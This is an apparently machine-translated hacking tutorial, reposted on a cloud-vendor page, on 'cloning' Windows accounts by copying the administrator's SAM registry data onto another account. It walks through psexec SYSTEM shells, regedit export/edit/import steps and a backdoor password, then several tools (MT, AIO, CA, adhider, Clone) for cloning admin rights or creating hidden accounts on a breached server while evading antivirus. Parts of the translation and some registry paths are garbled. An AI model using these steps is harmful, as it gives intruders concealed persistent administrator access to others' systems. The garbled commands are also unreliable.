The principle and harm of cloning account
1. The principle of cloning account
In the registry, there are two SID relative markers that hold the account, one is the subkey name under the registry hkey_local_machine\sam\amdomains\accountusers, and the other is the value of the subkey F of the subkey. But Microsoft has made a mistake in not synchronizing them, using the latter when logging in, using the former when querying. When using the "F" of the administrator to cover the other account of F, it caused the account is administrator rights, but the query or the original state of the situation, this is called the clone account.
Security little knowledge: SID is the security Identifiers, the unique number that identifies users, groups, and computer accounts. The first time the account is created, a unique SID is released for each account on the network. Internal processes in Windows 2000 will refer to the SID of the account and not to the user or group name of the account. If you create an account, delete an account, and then create another account with the same username, the new account will not have the power or authority to authorize the previous account because the account has a different SID number.
2. The harm of cloning account
When the system user is cloned, with Terminal Services, it is tantamount to opening a hidden backdoor to attackers, allowing attackers to enter your system at any time, a door you cannot see because it relies on Microsoft's Terminal Services and does not release virus files, so it will not be killed by antivirus software.
Second, the common methods of cloning users
1. Manual Cloning Method One
In Windows 2000/xp/2003 and Windows NT, the SID of the default administrator account is fixed (0X1F4), so we can clone the SID 500 account with an existing account in the machine, where we choose the account number IUSR_ Xodu5ptt910nhoo (Xodu5ptt910nhoo) is the name of the server machine that has been breached. In order to enhance the concealment, we chose this account, all users can use the following methods, but this user is more common just.
One of the tools we'll use here is psexec, a lightweight Telnet replacement that allows you to perform processes on other systems without having to manually install the client software and gain complete interactivity with console applications. One of the most powerful features of PsExec is the launch of an interactive command prompt window in remote systems and remote support tools (such as IpConfig) to display information about remote systems that cannot be displayed in other ways.
Execution: psexec-i-s-d cmd runs a system cmd Shell, as shown in Figure 1.
| Figure 1 |
Get a cmd shell with system privileges and run "regedit/e admin.reg hkey_local_machine\sam\sam\domains\account\users\" inside the cmd shell. 000001F4, so we export the information about the administrator account for the SID (0x1f4), as shown in Figure 2.
| Figure 2 |
Then edit the Admin.reg file to modify "1F4" in the third line of the Admin.reg file to IUSR_ Xodu5ptt910nhoo SID, modify "1f4" in the file to "3EB", as shown in Figure 3.
| Figure 3 |
After saving, then execute the following command: "regedit/s admin.reg", import the Admin.reg file, finally execute the net user Iusr_xodu5ptt910nhoo n3tl04d command, modify the IUSR_ The Xodu5ptt910nhoo password is n3tl04d. It is recommended that the best use of 14-bit password, that is, the more like Iusr_xodu5ptt910nhoo password better, now, you can use Iusr_xodu5ptt910nhoo password for n3tl04d remote logins, and the same configuration as the administrator environment! As shown in Figure 4.
| Figure 4 |
Note: The SID of the Iusr_machine user in most machines is 0x3e9 (if the machine did not have IIS installed at the time of the initial installation, but it may not be the value to install IIS after it was created), if unsure, you can use:
The "regedit/e sid.reg hkey_local_machine\sam\sam\domains\account\users\names\iusr_machine" command leads out of the registry, You can then edit the Sid.reg file to see the SID as "3EB", as shown in Figure 5.
| Figure 5 |
2. Manual Cloning Method Two
Another way to clone an account is to run Regedt32.exe first, expand the registry to Hkey_local_machine\sam\sam, and then click edit → permissions on the menu bar (Windows 2000 is the "security" → "permission" of the menu bar) that pops up Sam's Permissions window, click Administrators, check the window to allow Full Control, (Windows 2000 is in the window to check "Allow inheritable permissions from parent to propagate to this object") and click "OK" button. As shown in Figure 6.
| Figure 6 |
To find Hkey_local_machine\sam\sam\domainsaccount\users\00001f4, double-click the "F" item in the right window, as shown in Figure 7.
| Figure 7 |
3. Using MT cloning
Mt.exe is a very powerful network tool, it mainly executes in the command line, you can open System services, check users and directly display user login password. It is like a double-edged sword, intruders and system administrators have to use it, but because it is often used by intruders, so many anti-virus software listed as a virus.
A detailed test report on MT can be read to Http://www.antian365.com/bbs/viewthread.php?tid=2786&extra=page%3D1&frombbs=1. The use of cloned users is as follows:
Mt-clone
such as: Mt-clone adminstrator Iusr_xodu5ptt910nhoo
As shown in Figure 8.
| Figure 8 |
4. Using AIO clones
AIO (all in one) is a "tool" written by Wineggdrop that integrates a number of gadgets, including cloning users, modifying the startup type of the service, deleting system accounts, checking system-hidden services, port scans, port forwarding, and so on.
The use of Aio cloning is simple: aio.exe-clone normal account to be cloned account password
such as: Aio.exe-clone Administrator Iusr_xodu5ptt910nhoo n3tl04d
This allows you to log on as an administrator with iusr_xodu5ptt910nhoo\n3tl04d.
As shown in Figure 9.
| Figure 9 |
5. Using a CA clone
Ca.exe Small Banyan wrote a remote cloning account tool, of course, local cloning is no problem.
Use the following: CA \\IP address Administrator username Admin Password cloned user password
such as: CA \\127.0.0.1 Administrator 123456 Iusr_xodu5ptt910nhoo 123456
As shown in Figure 10.
| Figure 10 |
6. Create a hidden account
The tool that needs to be used is called adhider, a tool that is written by Jin Woolly to build a hidden user specifically. The disadvantage of this tool is that when the server is restarted, the user will not be able to hide it, which is displayed in user management.
Use the following: Adhider User name password
such as: Adhider n3tl04d$\123456
As shown in Figure 11.
| Figure 11 |
7. Using Clone clones
Clone is a 28 degree ice written by a cloning tool that only supports windows2003 and Windows XP and does not support Windows2000. The disadvantage of this tool is that when the server is restarted, the user will not be able to hide it, which is displayed in user management.
Use the following: Clone.exe User name password
such as: Clone n3tl04d 520mm
As shown in Figure 12.
| Figure 12 |
You can use the n3tl04d\520mm login to get and administrator privileges.
Note: If you use the Mt check after using clone clone under Windows 2003, you will be prompted to have no system privileges, you may need to reboot your computer, or run a cmd with system privileges to use MT inspection.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
